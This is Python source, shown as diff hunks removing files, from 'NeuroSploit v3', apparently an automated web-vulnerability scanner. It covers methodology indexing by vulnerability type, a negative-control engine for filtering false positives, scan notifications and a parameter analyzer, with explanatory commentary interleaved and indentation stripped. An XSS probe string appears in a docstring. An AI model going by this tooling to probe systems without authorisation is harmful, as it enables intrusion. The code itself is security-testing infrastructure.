base_vt = base_vt.replace("_error", "").replace("_union", "").replace("_blind", "").replace("_time", "")
if base_vt != vuln_type:
for fid in self.vuln_type_index.get(base_vt, []):
candidate_fase_ids.add(fid)
# Filter by context
if context:
context_fases = set(self.context_index.get(context, []))
if candidate_fase_ids:
# Intersect for precision
filtered = candidate_fase_ids & context_fases
if filtered:
candidate_fase_ids = filtered
# If intersection is empty, keep vuln_type matches (they're more specific)
else:
# No vuln_type specified: use all context matches
candidate_fase_ids = context_fases
if not candidate_fase_ids:
return ""
# Build output, preferring targeted sub-sections
parts: List[str] = []
total = 0
for fase_id in sorted(candidate_fase_ids):
section = self.sections.get(fase_id)
if not section:
continue
remaining = max_chars - total
if remaining < 100:
break
# Try to find a targeted sub-section first
best_sub = self._find_best_subsection(section, vuln_type)
if best_sub:
title, content = best_sub
text = f"### {title}\n{content}"
else:
# Use full section content, truncated
text = f"### {section.title}\n{section.content}"
if len(text) > remaining:
text = text[:remaining]
if len(text) < 50:
continue # Skip tiny fragments
parts.append(text)
total += len(text)
return "\n\n".join(parts)
def _find_best_subsection(
self, section: MethodologySection, vuln_type: str
) -> Optional[tuple]:
"""Find the sub-section most relevant to a vuln_type."""
if not vuln_type or not section.sub_sections:
return None
# Normalize for matching
vt_variants = set()
vt_lower = vuln_type.lower()
vt_variants.add(vt_lower)
vt_variants.add(vt_lower.replace("_", " "))
vt_variants.add(vt_lower.replace("_", "-"))
# Common name mappings
name_map = {
"sqli": "sql injection",
"xss_reflected": "reflected xss",
"xss_stored": "stored xss",
"xss_dom": "dom xss",
"lfi": "lfi",
"rfi": "rfi",
"ssrf": "ssrf",
"ssti": "ssti",
"xxe": "xxe",
"nosql_injection": "nosql",
"crlf_injection": "crlf",
"cors_misconfig": "cors",
"insecure_deserialization": "deserialization",
"http_request_smuggling": "request smuggling",
"cache_poisoning": "cache poisoning",
"prototype_pollution": "prototype pollution",
}
mapped = name_map.get(vt_lower)
if mapped:
vt_variants.add(mapped)
best_score = 0
best = None
for sub_title, sub_content in section.sub_sections.items():
title_lower = sub_title.lower()
score = 0
for variant in vt_variants:
if variant in title_lower:
score = 10 # Title match is strongest
break
if variant in sub_content[:500].lower():
score = max(score, 5) # Content match
if score > best_score:
best_score = score
best = (sub_title, sub_content)
return best
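The scoring in `_find_best_subsection` can be tried out on a plain dict. The sketch below is a simplified stand-in, assuming sub-sections are a `Dict[str, str]` of title to content; `pick_subsection` is a hypothetical name, and the `name_map` aliases are deliberately left out to show what they are for.

```python
from typing import Dict, Optional, Tuple


def pick_subsection(
    sub_sections: Dict[str, str], vuln_type: str
) -> Optional[Tuple[str, str]]:
    """Return the (title, content) pair that best matches vuln_type, or None."""
    if not vuln_type or not sub_sections:
        return None
    vt = vuln_type.lower()
    # Spelling variants, e.g. "xss_stored", "xss stored", "xss-stored"
    variants = {vt, vt.replace("_", " "), vt.replace("_", "-")}

    best, best_score = None, 0
    for title, content in sub_sections.items():
        title_lower = title.lower()
        if any(v in title_lower for v in variants):
            score = 10  # a title hit outranks any content hit
        elif any(v in content[:500].lower() for v in variants):
            score = 5  # only the first 500 characters are scanned
        else:
            score = 0
        if score > best_score:  # strict '>' keeps the earliest of equal scores
            best, best_score = (title, content), score
    return best


subs = {
    "Overview": "General notes; ssrf is covered elsewhere.",
    "SSRF via URL parameters": "Point the parameter at an internal host.",
    "Stored XSS": "Persist the payload and reload the page.",
}
print(pick_subsection(subs, "ssrf")[0])
print(pick_subsection(subs, "xss_stored"))
```

Without the alias table, `xss_stored` finds nothing here, because none of its spelling variants appears in the title "Stored XSS". That gap is what the `"xss_stored": "stored xss"` entry in `name_map` closes.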
class MethodologyLoader:
"""Loads and indexes methodology documents from files or DB prompts."""
def load_from_file(self, file_path: str) -> MethodologyIndex:
"""Load a .md methodology file and build an index."""
if not os.path.exists(file_path):
logger.warning(f"Methodology file not found: {file_path}")
return MethodologyIndex()
try:
with open(file_path, "r", encoding="utf-8") as f:
content = f.read()
except Exception as e:
logger.error(f"Failed to read methodology file: {e}")
return MethodologyIndex()
sections = self._parse_markdown_sections(content)
index = MethodologyIndex()
for section in sections:
index.add_section(section)
logger.info(
f"[METHODOLOGY] Loaded {len(sections)} sections from {file_path} "
f"({sum(s.char_count for s in sections)} chars, "
f"{len(index.vuln_type_index)} vuln types mapped)"
)
return index
def load_from_db_prompts(self, prompts: List[Dict]) -> MethodologyIndex:
"""Index database-loaded custom prompts into a MethodologyIndex."""
index = MethodologyIndex()
for i, p in enumerate(prompts):
content = p.get("content", "")
if not content:
continue
parsed_vulns = p.get("parsed_vulnerabilities", [])
# Try FASE-based parsing first
sections = self._parse_markdown_sections(content)
if not sections:
# Treat entire content as one section
vuln_types = [
v.get("type", "") for v in parsed_vulns if v.get("type")
]
if not vuln_types:
vuln_types = self._detect_vuln_types_by_keywords(content)
section = MethodologySection(
fase_id=f"db_prompt_{i}",
title=p.get("name", f"Custom Prompt {i}"),
content=content,
sub_sections={},
vuln_types=vuln_types,
contexts=["testing", "strategy", "confirmation",
"verification", "reporting"],
)
sections = [section]
for section in sections:
index.add_section(section)
logger.info(
f"[METHODOLOGY] Indexed {len(index.sections)} sections from "
f"{len(prompts)} DB prompts"
)
return index
def merge_indices(self, *indices: MethodologyIndex) -> MethodologyIndex:
"""Merge multiple MethodologyIndex objects into one."""
merged = MethodologyIndex()
for idx in indices:
for section in idx.sections.values():
# Avoid duplicate fase_ids
if section.fase_id not in merged.sections:
merged.add_section(section)
return merged
def _parse_markdown_sections(self, content: str) -> List[MethodologySection]:
"""Parse a markdown document into indexed sections.
Looks for FASE headings first, falls back to generic ## headings.
"""
sections = self._parse_fase_sections(content)
if sections:
return sections
# Fallback: parse generic ## headings
return self._parse_generic_sections(content)
def _parse_fase_sections(self, content: str) -> List[MethodologySection]:
"""Parse FASE-structured methodology documents."""
# Match ## FASE N: or # FASE N: or ## 🔐 FASE N: (with emoji)
fase_pattern = re.compile(
r'^(#{1,2})\s*(?:[^\w]*\s*)?FASE\s+(\d+)\s*[:\-]?\s*(.*?)$',
re.MULTILINE | re.IGNORECASE,
)
matches = list(fase_pattern.finditer(content))
if not matches:
return []
sections: List[MethodologySection] = []
# Also capture pre-FASE content (e.g., recon steps before FASE 1)
if matches[0].start() > 200:
pre_content = content[:matches[0].start()].strip()
if pre_content:
pre_subs = self._extract_sub_sections(pre_content)
sections.append(MethodologySection(
fase_id="fase_0",
title="Recon & Preparation",
content=pre_content,
sub_sections=pre_subs,
vuln_types=FASE_VULN_TYPE_MAP.get("fase_0", []),
contexts=FASE_CONTEXT_MAP.get("fase_0", ["strategy"]),
))
for i, match in enumerate(matches):
fase_num = match.group(2)
fase_title = f"FASE {fase_num}: {match.group(3).strip()}"
start = match.end()
end = matches[i + 1].start() if i + 1 < len(matches) else len(content)
body = content[start:end].strip()
fase_id = f"fase_{fase_num}"
sub_sections = self._extract_sub_sections(body)
vuln_types = FASE_VULN_TYPE_MAP.get(fase_id, [])
contexts = FASE_CONTEXT_MAP.get(fase_id, ["testing"])
# If not in our hardcoded map, try keyword detection
if not vuln_types:
vuln_types = self._detect_vuln_types_by_keywords(body)
sections.append(MethodologySection(
fase_id=fase_id,
title=fase_title,
content=body,
sub_sections=sub_sections,
vuln_types=vuln_types,
contexts=contexts,
))
return sections
def _parse_generic_sections(self, content: str) -> List[MethodologySection]:
"""Parse generic ## heading structured documents."""
heading_pattern = re.compile(r'^##\s+(.*?)$', re.MULTILINE)
matches = list(heading_pattern.finditer(content))
if not matches:
return []
sections: List[MethodologySection] = []
for i, match in enumerate(matches):
title = match.group(1).strip()
start = match.end()
end = matches[i + 1].start() if i + 1 < len(matches) else len(content)
body = content[start:end].strip()
vuln_types = self._detect_vuln_types_by_keywords(
title + " " + body[:1000]
)
sub_sections = self._extract_sub_sections(body)
sections.append(MethodologySection(
fase_id=f"section_{i}",
title=title,
content=body,
sub_sections=sub_sections,
vuln_types=vuln_types,
contexts=["testing", "strategy"],
))
return sections
def _extract_sub_sections(self, body: str) -> Dict[str, str]:
"""Extract ### sub-sections from a section body."""
sub_pattern = re.compile(r'^###\s+(.*?)$', re.MULTILINE)
sub_matches = list(sub_pattern.finditer(body))
sub_sections: Dict[str, str] = {}
for j, sub in enumerate(sub_matches):
sub_title = sub.group(1).strip()
sub_start = sub.end()
sub_end = (
sub_matches[j + 1].start()
if j + 1 < len(sub_matches)
else len(body)
)
sub_content = body[sub_start:sub_end].strip()
if sub_content:
sub_sections[sub_title] = sub_content
return sub_sections
def _detect_vuln_types_by_keywords(self, text: str) -> List[str]:
"""Detect vuln types from text content via keyword matching."""
text_lower = text.lower()
found: List[str] = []
seen: set = set()
for keyword, types in KEYWORD_VULN_MAP.items():
if keyword in text_lower:
for vt in types:
if vt not in seen:
found.append(vt)
seen.add(vt)
return found
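To see how the FASE heading pattern slices a document, the following sketch reuses the regular expression from `_parse_fase_sections` on a tiny sample. `split_fases` and the sample text are illustrative assumptions; the real parser also builds `MethodologySection` objects and looks up the vuln-type and context maps.

```python
import re
from typing import List, Tuple

# Same pattern as in _parse_fase_sections
FASE_HEADING = re.compile(
    r'^(#{1,2})\s*(?:[^\w]*\s*)?FASE\s+(\d+)\s*[:\-]?\s*(.*?)$',
    re.MULTILINE | re.IGNORECASE,
)


def split_fases(markdown: str) -> List[Tuple[str, str, str]]:
    """Return (fase_id, title, body) for each FASE heading (hypothetical helper)."""
    matches = list(FASE_HEADING.finditer(markdown))
    out = []
    for i, m in enumerate(matches):
        # A section body runs until the next FASE heading or the end of the text.
        end = matches[i + 1].start() if i + 1 < len(matches) else len(markdown)
        body = markdown[m.end():end].strip()
        out.append((f"fase_{m.group(2)}", m.group(3).strip(), body))
    return out


doc = (
    "# FASE 1: Recon\n"
    "Enumerate subdomains.\n"
    "## FASE 2 - Injection\n"
    "### SQLi\n"
    "Try a single quote.\n"
)
for fase_id, title, body in split_fases(doc):
    print(fase_id, "|", title, "|", repr(body))
```

The `### SQLi` line stays inside the body of `fase_2`, where `_extract_sub_sections` would later pick it up as a sub-section.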
@@ -1,321 +0,0 @@
"""
NeuroSploit v3 - Negative Control Engine
Sends benign/control payloads and compares responses to detect false positives
from same-behavior patterns. If the application responds the same way to a
benign value as it does to an attack payload, the finding is likely a false positive.
"""
import hashlib
import logging
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple, Any
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Result types
# ---------------------------------------------------------------------------
@dataclass
class ControlTestResult:
"""Result of a single control test."""
control_type: str # "benign", "empty", "no_param"
control_value: str # The control payload used
status_match: bool # Did status code match attack response?
length_similar: bool # Body length within threshold?
hash_match: bool # Exact body match?
same_behavior: bool # Overall: does this control look the same?
detail: str = ""
@dataclass
class NegativeControlResult:
"""Aggregated result of all negative control tests."""
same_behavior: bool # True if ANY control shows same behavior as attack
controls_run: int # How many controls were executed
controls_matching: int # How many showed same behavior
confidence_adjustment: int # Confidence delta: -60 if same_behavior, +20 when the controls pass
results: List[ControlTestResult] = field(default_factory=list)
detail: str = ""
# ---------------------------------------------------------------------------
# Engine
# ---------------------------------------------------------------------------
class NegativeControlEngine:
"""Sends control payloads to detect false positives from same-behavior responses.
The key insight: if the application responds identically to "test123" and
to "<script>alert(1)</script>", then the XSS payload was NOT processed;
the application simply ignores or sanitizes the parameter entirely.
"""
# Benign values that should NEVER trigger a vulnerability
BENIGN_PAYLOADS: Dict[str, List[str]] = {
# XSS: plain text, no special chars
"xss_reflected": ["test123", "hello world"],
"xss_stored": ["test123", "hello world"],
"xss_dom": ["test123", "hello world"],
"xss": ["test123", "hello world"],
# SQLi: normal numeric/text values
"sqli": ["1", "test"],
"sqli_error": ["1", "test"],
"sqli_union": ["1", "test"],
"sqli_blind": ["1", "test"],
"sqli_time": ["1", "test"],
# SSRF: safe external URL or plain text
"ssrf": ["https://www.example.com", "test"],
"ssrf_cloud": ["https://www.example.com", "test"],
# LFI: safe existing page or plain text
"lfi": ["index.html", "test.txt"],
"path_traversal": ["index.html", "test.txt"],
# SSTI: plain text, no template syntax
"ssti": ["hello", "12345"],
# RCE: plain text, no shell metacharacters
"rce": ["test", "hello"],
"command_injection": ["test", "hello"],
# Open redirect: safe internal URL
"open_redirect": ["/", "/index.html"],
# CRLF: normal header value
"crlf_injection": ["test-value", "normal"],
"header_injection": ["test-value", "normal"],
# XXE: plain text (no XML entities)
"xxe": ["test", "hello"],
# NoSQL: normal value
"nosql_injection": ["test", "1"],
# Host header: normal hostname
"host_header_injection": ["localhost", "example.com"],
# Default for any unlisted type
"default": ["test123", "benign_value"],
}
# Body length similarity threshold (percentage)
LENGTH_THRESHOLD_PCT = 5.0 # Within 5% = "same"
async def run_controls(
self,
url: str,
param: str,
method: str,
vuln_type: str,
attack_response: Dict,
make_request_fn: Callable,
baseline: Optional[Dict] = None,
injection_point: str = "parameter",
) -> NegativeControlResult:
"""Run negative control tests and compare with the attack response.
Args:
url: Target URL
param: Parameter name being tested
method: HTTP method
vuln_type: Vulnerability type
attack_response: The response from the attack payload
make_request_fn: Async function to make HTTP requests
baseline: Optional baseline response
injection_point: Where payload is injected (parameter, header, body, path)
Returns:
NegativeControlResult with same_behavior flag and details
"""
results: List[ControlTestResult] = []
controls_matching = 0
attack_status = attack_response.get("status", 0)
attack_body = attack_response.get("body", "")
attack_length = len(attack_body)
attack_hash = hashlib.md5(
attack_body.encode("utf-8", errors="replace")
).hexdigest()
# Get benign payloads for this vuln type
base_type = vuln_type.split("_")[0] if "_" in vuln_type else vuln_type
benign_values = self.BENIGN_PAYLOADS.get(
vuln_type,
self.BENIGN_PAYLOADS.get(base_type, self.BENIGN_PAYLOADS["default"])
)
# Control 1: Benign payload
for benign in benign_values[:2]:
try:
control_resp = await self._send_control(
url, param, method, benign, make_request_fn, injection_point
)
if control_resp:
result = self._compare_responses(
"benign", benign, attack_status, attack_length,
attack_hash, control_resp
)
results.append(result)
if result.same_behavior:
controls_matching += 1
except Exception as e:
logger.debug(f"Negative control (benign) failed: {e}")
# Control 2: Empty value
try:
control_resp = await self._send_control(
url, param, method, "", make_request_fn, injection_point
)
if control_resp:
result = self._compare_responses(
"empty", "", attack_status, attack_length,
attack_hash, control_resp
)
results.append(result)
if result.same_behavior:
controls_matching += 1
except Exception as e:
logger.debug(f"Negative control (empty) failed: {e}")
# Control 3: Request without the parameter entirely (if applicable)
if injection_point == "parameter" and param:
try:
control_resp = await self._send_without_param(
url, param, method, make_request_fn
)
if control_resp:
result = self._compare_responses(
"no_param", "(omitted)", attack_status, attack_length,
attack_hash, control_resp
)
results.append(result)
if result.same_behavior:
controls_matching += 1
except Exception as e:
logger.debug(f"Negative control (no_param) failed: {e}")
# Determine overall same_behavior
controls_run = len(results)
same_behavior = controls_matching > 0
# Build detail string
if same_behavior:
matching_types = [r.control_type for r in results if r.same_behavior]
detail = (f"NEGATIVE CONTROL FAILED: {controls_matching}/{controls_run} "
f"controls show same behavior as attack ({', '.join(matching_types)})")
else:
detail = f"Negative controls passed: 0/{controls_run} controls match attack response"
return NegativeControlResult(
same_behavior=same_behavior,
controls_run=controls_run,
controls_matching=controls_matching,
# Only reward passing controls if at least one control actually ran
confidence_adjustment=-60 if same_behavior else (20 if controls_run else 0),
results=results,
detail=detail,
)
async def _send_control(
self,
url: str,
param: str,
method: str,
value: str,
make_request_fn: Callable,
injection_point: str,
) -> Optional[Dict]:
"""Send a control request with the given value."""
if injection_point == "parameter":
return await make_request_fn(url, method, {param: value})
elif injection_point == "header":
# For header injection, we'd need to pass custom headers
# Fall back to parameter injection for control testing
return await make_request_fn(url, method, {param: value})
elif injection_point == "path":
# For path injection, append benign value to path
parsed = urlparse(url)
control_url = urlunparse(parsed._replace(
path=parsed.path.rstrip("/") + "/" + value
))
return await make_request_fn(control_url, method, {})
elif injection_point == "body":
return await make_request_fn(url, method, {param: value})
else:
return await make_request_fn(url, method, {param: value})
async def _send_without_param(
self,
url: str,
param: str,
method: str,
make_request_fn: Callable,
) -> Optional[Dict]:
"""Send request without the tested parameter."""
# Strip the param from URL query string if present
parsed = urlparse(url)
if parsed.query:
params = parse_qs(parsed.query, keep_blank_values=True)
params.pop(param, None)
new_query = urlencode(params, doseq=True)
clean_url = urlunparse(parsed._replace(query=new_query))
else:
clean_url = url
return await make_request_fn(clean_url, method, {})
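The query-string handling in `_send_without_param` relies only on `urllib.parse`, so it can be checked on its own. A minimal sketch, with `drop_param` as a hypothetical synchronous helper that returns the cleaned URL instead of sending a request:

```python
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse


def drop_param(url: str, param: str) -> str:
    """Return url with every occurrence of param removed from the query string."""
    parsed = urlparse(url)
    if not parsed.query:
        return url
    # keep_blank_values=True preserves parameters such as "debug="
    params = parse_qs(parsed.query, keep_blank_values=True)
    params.pop(param, None)
    # doseq=True writes repeated keys back as key=a&key=b
    return urlunparse(parsed._replace(query=urlencode(params, doseq=True)))


print(drop_param("https://example.com/item?id=7&lang=en&tag=a&tag=b", "id"))
print(drop_param("https://example.com/item?id=7", "id"))
```

Repeated keys such as `tag` survive the round trip, and a URL whose only parameter is removed comes back without a trailing `?`.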
def _compare_responses(
self,
control_type: str,
control_value: str,
attack_status: int,
attack_length: int,
attack_hash: str,
control_response: Dict,
) -> ControlTestResult:
"""Compare a control response against the attack response."""
control_status = control_response.get("status", 0)
control_body = control_response.get("body", "")
control_length = len(control_body)
control_hash = hashlib.md5(
control_body.encode("utf-8", errors="replace")
).hexdigest()
# Status code match
status_match = (attack_status == control_status)
# Body hash exact match
hash_match = (attack_hash == control_hash)
# Body length similarity
if attack_length == 0 and control_length == 0:
length_similar = True
elif attack_length == 0 or control_length == 0:
length_similar = False
else:
diff_pct = abs(attack_length - control_length) / max(attack_length, 1) * 100
length_similar = diff_pct <= self.LENGTH_THRESHOLD_PCT
# Same behavior if status matches AND (exact hash match OR length similar)
same_behavior = status_match and (hash_match or length_similar)
detail = (f"{control_type}('{control_value[:30]}'): "
f"status {'=' if status_match else '!'}= {control_status}, "
f"len {control_length} "
f"({'same' if length_similar else 'different'} from {attack_length})"
f"{', EXACT MATCH' if hash_match else ''}")
return ControlTestResult(
control_type=control_type,
control_value=control_value[:50],
status_match=status_match,
length_similar=length_similar,
hash_match=hash_match,
same_behavior=same_behavior,
detail=detail,
)
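The comparison rule in `_compare_responses` (same status, and either an identical body or a body length within 5%) is easy to exercise without any HTTP traffic. The sketch below is an assumption-laden reduction: `same_behavior` is a free function here, and responses are plain dicts with `status` and `body` keys as in the original.

```python
import hashlib
from typing import Dict

LENGTH_THRESHOLD_PCT = 5.0  # same threshold as the engine


def body_hash(body: str) -> str:
    # MD5 is used only as a cheap equality fingerprint, not for security.
    return hashlib.md5(body.encode("utf-8", errors="replace")).hexdigest()


def same_behavior(attack: Dict, control: Dict) -> bool:
    """True if the control response looks like the attack response."""
    a_body, c_body = attack.get("body", ""), control.get("body", "")
    status_match = attack.get("status", 0) == control.get("status", 0)
    hash_match = body_hash(a_body) == body_hash(c_body)
    if not a_body and not c_body:
        length_similar = True
    elif not a_body or not c_body:
        length_similar = False
    else:
        diff_pct = abs(len(a_body) - len(c_body)) / len(a_body) * 100
        length_similar = diff_pct <= LENGTH_THRESHOLD_PCT
    return status_match and (hash_match or length_similar)


attack = {"status": 200, "body": "<html>" + "x" * 1000 + "</html>"}
near = {"status": 200, "body": "<html>" + "x" * 1010 + "</html>"}
far = {"status": 200, "body": "<html>" + "x" * 1200 + "</html>"}
error = {"status": 500, "body": attack["body"]}

print(same_behavior(attack, near))   # length differs by about 1%
print(same_behavior(attack, far))    # length differs by about 20%
print(same_behavior(attack, error))  # status differs
```

One consequence of the rule as written: on a large page, a short reflected payload changes the length by less than 5%, so a length-only comparison may treat a genuine reflection as "same behavior". Callers may want to weigh `hash_match` and `length_similar` separately for that reason.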
@@ -1,308 +0,0 @@
"""
NeuroSploit v3 - Multi-Channel Notification Manager
Sends scan event alerts to Discord, Telegram, and WhatsApp (Twilio).
Hooks into the existing WebSocket broadcast infrastructure as event source.
All channels are disabled by default (opt-in via .env).
Uses only aiohttp (already a dependency) for HTTP calls.
"""
import asyncio
import base64
import logging
import os
from datetime import datetime
from enum import Enum
from typing import Any, Dict, List, Optional
from urllib.parse import quote
import aiohttp
logger = logging.getLogger(__name__)
class NotificationEvent(Enum):
SCAN_STARTED = "scan_started"
VULN_FOUND = "vuln_found"
SCAN_COMPLETED = "scan_completed"
SCAN_FAILED = "scan_failed"
# Severity → Discord embed color
SEVERITY_COLORS = {
"critical": 0xFF0000,
"high": 0xFF6600,
"medium": 0xFFCC00,
"low": 0x33CC33,
"info": 0x3399FF,
}
class NotificationManager:
"""Async multi-channel notification dispatcher.
Sends fire-and-forget notifications to configured channels.
Never blocks the scan flow; all errors are swallowed and logged.
"""
def __init__(self):
self.reload_config()
def reload_config(self):
"""(Re)load configuration from environment variables."""
self.enabled = os.getenv("ENABLE_NOTIFICATIONS", "false").lower() == "true"
# Discord
self.discord_webhook = os.getenv("DISCORD_WEBHOOK_URL", "").strip()
# Telegram
self.telegram_token = os.getenv("TELEGRAM_BOT_TOKEN", "").strip()
self.telegram_chat_id = os.getenv("TELEGRAM_CHAT_ID", "").strip()
# WhatsApp (Twilio)
self.twilio_sid = os.getenv("TWILIO_ACCOUNT_SID", "").strip()
self.twilio_token = os.getenv("TWILIO_AUTH_TOKEN", "").strip()
self.twilio_from = os.getenv("TWILIO_FROM_NUMBER", "").strip()
self.twilio_to = os.getenv("TWILIO_TO_NUMBER", "").strip()
# Severity filter
raw = os.getenv("NOTIFICATION_SEVERITY_FILTER", "critical,high").strip()
# Lowercase entries so "Critical,High" matches the lowercased severity in notify()
self.severity_filter = set(s.strip().lower() for s in raw.split(",") if s.strip())
@property
def has_discord(self) -> bool:
return bool(self.discord_webhook)
@property
def has_telegram(self) -> bool:
return bool(self.telegram_token and self.telegram_chat_id)
@property
def has_whatsapp(self) -> bool:
return bool(self.twilio_sid and self.twilio_token and self.twilio_from and self.twilio_to)
async def notify(self, event: NotificationEvent, data: Dict[str, Any]):
"""Send notification to all configured channels.
For VULN_FOUND events, respects the severity filter.
"""
if not self.enabled:
return
# Severity filter for vulnerability findings
if event == NotificationEvent.VULN_FOUND:
severity = data.get("severity", "").lower()
if severity not in self.severity_filter:
return
tasks = []
if self.has_discord:
tasks.append(self._send_discord(event, data))
if self.has_telegram:
tasks.append(self._send_telegram(event, data))
if self.has_whatsapp:
tasks.append(self._send_whatsapp(event, data))
if tasks:
await asyncio.gather(*tasks, return_exceptions=True)
# ── Discord ──────────────────────────────────────────────────────
async def _send_discord(self, event: NotificationEvent, data: Dict):
"""Send Discord webhook with rich embed."""
try:
embed = self._build_discord_embed(event, data)
payload = {"embeds": [embed]}
async with aiohttp.ClientSession() as session:
async with session.post(
self.discord_webhook,
json=payload,
timeout=aiohttp.ClientTimeout(total=10),
) as resp:
if resp.status not in (200, 204):
body = await resp.text()
logger.warning(f"Discord notification failed ({resp.status}): {body[:200]}")
except Exception as e:
logger.warning(f"Discord notification error: {e}")
def _build_discord_embed(self, event: NotificationEvent, data: Dict) -> Dict:
"""Build Discord embed object."""
ts = datetime.utcnow().isoformat()
if event == NotificationEvent.SCAN_STARTED:
return {
"title": "Scan Started",
"description": f"Target: `{data.get('target', 'unknown')}`",
"color": 0x3399FF,
"timestamp": ts,
"footer": {"text": "NeuroSploit v3"},
}
elif event == NotificationEvent.VULN_FOUND:
severity = data.get("severity", "medium").lower()
return {
"title": f"{severity.upper()}: {data.get('title', 'Vulnerability Found')}",
"description": data.get("description", "")[:500] or f"Endpoint: `{data.get('endpoint', '')}`",
"color": SEVERITY_COLORS.get(severity, 0xFFCC00),
"fields": [
{"name": "Severity", "value": severity.upper(), "inline": True},
{"name": "Type", "value": data.get("vulnerability_type", "unknown"), "inline": True},
{"name": "Endpoint", "value": f"`{data.get('endpoint', 'N/A')}`", "inline": False},
],
"timestamp": ts,
"footer": {"text": "NeuroSploit v3"},
}
elif event == NotificationEvent.SCAN_COMPLETED:
total = data.get("total_vulnerabilities", 0)
crit = data.get("critical", 0)
high = data.get("high", 0)
med = data.get("medium", 0)
return {
"title": "Scan Completed",
"description": (
f"**{total}** vulnerabilities found\n"
f"Critical: **{crit}** | High: **{high}** | Medium: **{med}**"
),
"color": 0x00CC00 if total == 0 else 0xFF6600,
"timestamp": ts,
"footer": {"text": "NeuroSploit v3"},
}
elif event == NotificationEvent.SCAN_FAILED:
return {
"title": "Scan Failed",
"description": f"Error: {data.get('error', 'Unknown error')[:500]}",
"color": 0xFF0000,
"timestamp": ts,
"footer": {"text": "NeuroSploit v3"},
}
return {"title": event.value, "color": 0x999999, "timestamp": ts}
# ── Telegram ─────────────────────────────────────────────────────
async def _send_telegram(self, event: NotificationEvent, data: Dict):
"""Send Telegram message via Bot API."""
try:
text = self._build_telegram_text(event, data)
url = f"https://api.telegram.org/bot{self.telegram_token}/sendMessage"
payload = {
"chat_id": self.telegram_chat_id,
"text": text,
"parse_mode": "Markdown",
}
async with aiohttp.ClientSession() as session:
async with session.post(
url, json=payload,
timeout=aiohttp.ClientTimeout(total=10),
) as resp:
if resp.status != 200:
body = await resp.text()
logger.warning(f"Telegram notification failed ({resp.status}): {body[:200]}")
except Exception as e:
logger.warning(f"Telegram notification error: {e}")
def _build_telegram_text(self, event: NotificationEvent, data: Dict) -> str:
"""Build Telegram message text."""
if event == NotificationEvent.SCAN_STARTED:
return f"*Scan Started*\nTarget: `{data.get('target', 'unknown')}`"
elif event == NotificationEvent.VULN_FOUND:
sev = data.get("severity", "medium").upper()
return (
f"*{sev}: {data.get('title', 'Vulnerability Found')}*\n"
# Backticks keep underscores in type names (e.g. sqli_error) from being parsed as Markdown
f"Type: `{data.get('vulnerability_type', 'unknown')}`\n"
f"Endpoint: `{data.get('endpoint', 'N/A')}`"
)
elif event == NotificationEvent.SCAN_COMPLETED:
total = data.get("total_vulnerabilities", 0)
crit = data.get("critical", 0)
high = data.get("high", 0)
return (
f"*Scan Completed*\n"
f"Vulnerabilities: *{total}*\n"
f"Critical: {crit} | High: {high}"
)
elif event == NotificationEvent.SCAN_FAILED:
return f"*Scan Failed*\nError: {data.get('error', 'Unknown')[:300]}"
return f"*{event.value}*"
# ── WhatsApp (Twilio) ────────────────────────────────────────────
async def _send_whatsapp(self, event: NotificationEvent, data: Dict):
"""Send WhatsApp message via Twilio API."""
try:
text = self._build_telegram_text(event, data) # Reuse text format
# Strip markdown for WhatsApp
text = text.replace("*", "").replace("`", "")
url = f"https://api.twilio.com/2010-04-01/Accounts/{self.twilio_sid}/Messages.json"
auth_str = base64.b64encode(
f"{self.twilio_sid}:{self.twilio_token}".encode()
).decode()
form_data = {
"From": f"whatsapp:{self.twilio_from}",
"To": f"whatsapp:{self.twilio_to}",
"Body": text,
}
async with aiohttp.ClientSession() as session:
async with session.post(
url,
data=form_data,
headers={"Authorization": f"Basic {auth_str}"},
timeout=aiohttp.ClientTimeout(total=10),
) as resp:
if resp.status not in (200, 201):
body = await resp.text()
logger.warning(f"WhatsApp notification failed ({resp.status}): {body[:200]}")
except Exception as e:
logger.warning(f"WhatsApp notification error: {e}")
# ── Test ─────────────────────────────────────────────────────────
async def test_channel(self, channel: str) -> Dict:
"""Send a test notification to a specific channel."""
test_data = {
"target": "https://example.com",
"title": "Test Notification",
"severity": "info",
"vulnerability_type": "test",
"endpoint": "/test",
"total_vulnerabilities": 0,
"critical": 0,
"high": 0,
"medium": 0,
"error": "This is a test",
}
event = NotificationEvent.SCAN_STARTED
try:
if channel == "discord":
if not self.has_discord:
return {"success": False, "error": "Discord webhook URL not configured"}
await self._send_discord(event, test_data)
elif channel == "telegram":
if not self.has_telegram:
return {"success": False, "error": "Telegram bot token or chat ID not configured"}
await self._send_telegram(event, test_data)
elif channel == "whatsapp":
if not self.has_whatsapp:
return {"success": False, "error": "Twilio credentials not configured"}
await self._send_whatsapp(event, test_data)
else:
return {"success": False, "error": f"Unknown channel: {channel}"}
return {"success": True, "message": f"Test notification sent to {channel}"}
except Exception as e:
return {"success": False, "error": str(e)}
# Global singleton
notification_manager = NotificationManager()
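The gating logic in `notify` (only `vuln_found` events are filtered, and only by severity) can be sketched without aiohttp or environment variables. `parse_severity_filter` and `should_notify` are hypothetical helpers; the sketch lowercases the filter entries so that mixed-case values still match, which is a choice of this example.

```python
from typing import Set


def parse_severity_filter(raw: str) -> Set[str]:
    """Turn a comma-separated setting such as "critical,high" into a set."""
    return {s.strip().lower() for s in raw.split(",") if s.strip()}


def should_notify(event: str, severity: str, allowed: Set[str]) -> bool:
    """Lifecycle events always pass; findings pass only if severity is allowed."""
    if event != "vuln_found":
        return True
    return severity.lower() in allowed


allowed = parse_severity_filter("critical, High,")
print(sorted(allowed))
print(should_notify("vuln_found", "HIGH", allowed))
print(should_notify("vuln_found", "low", allowed))
print(should_notify("scan_completed", "", allowed))
```

With the default filter of `critical,high`, medium and low findings are dropped silently, while scan start, completion, and failure events are always delivered.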
@@ -1,200 +0,0 @@
"""
NeuroSploit v3 - Parameter Semantic Analyzer
Understands parameter semantics for targeted vulnerability testing.
Classifies parameters by name/value patterns and recommends
which vulnerability types to prioritize for each parameter.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple, Optional
@dataclass
class ParamProfile:
"""Profile of a single parameter."""
name: str
category: str # "id", "file", "url", "query", "auth", "code", "generic"
risk_score: float # 0.0 - 1.0
priority_vulns: List[str] = field(default_factory=list)
test_strategy: str = "default"
value_hint: str = "" # Observed value pattern
class ParameterAnalyzer:
"""Understands parameter semantics for targeted testing.
Instead of testing all parameters equally (params[:5]), this module
ranks parameters by attack potential and recommends specific vuln
types to test for each parameter.
"""
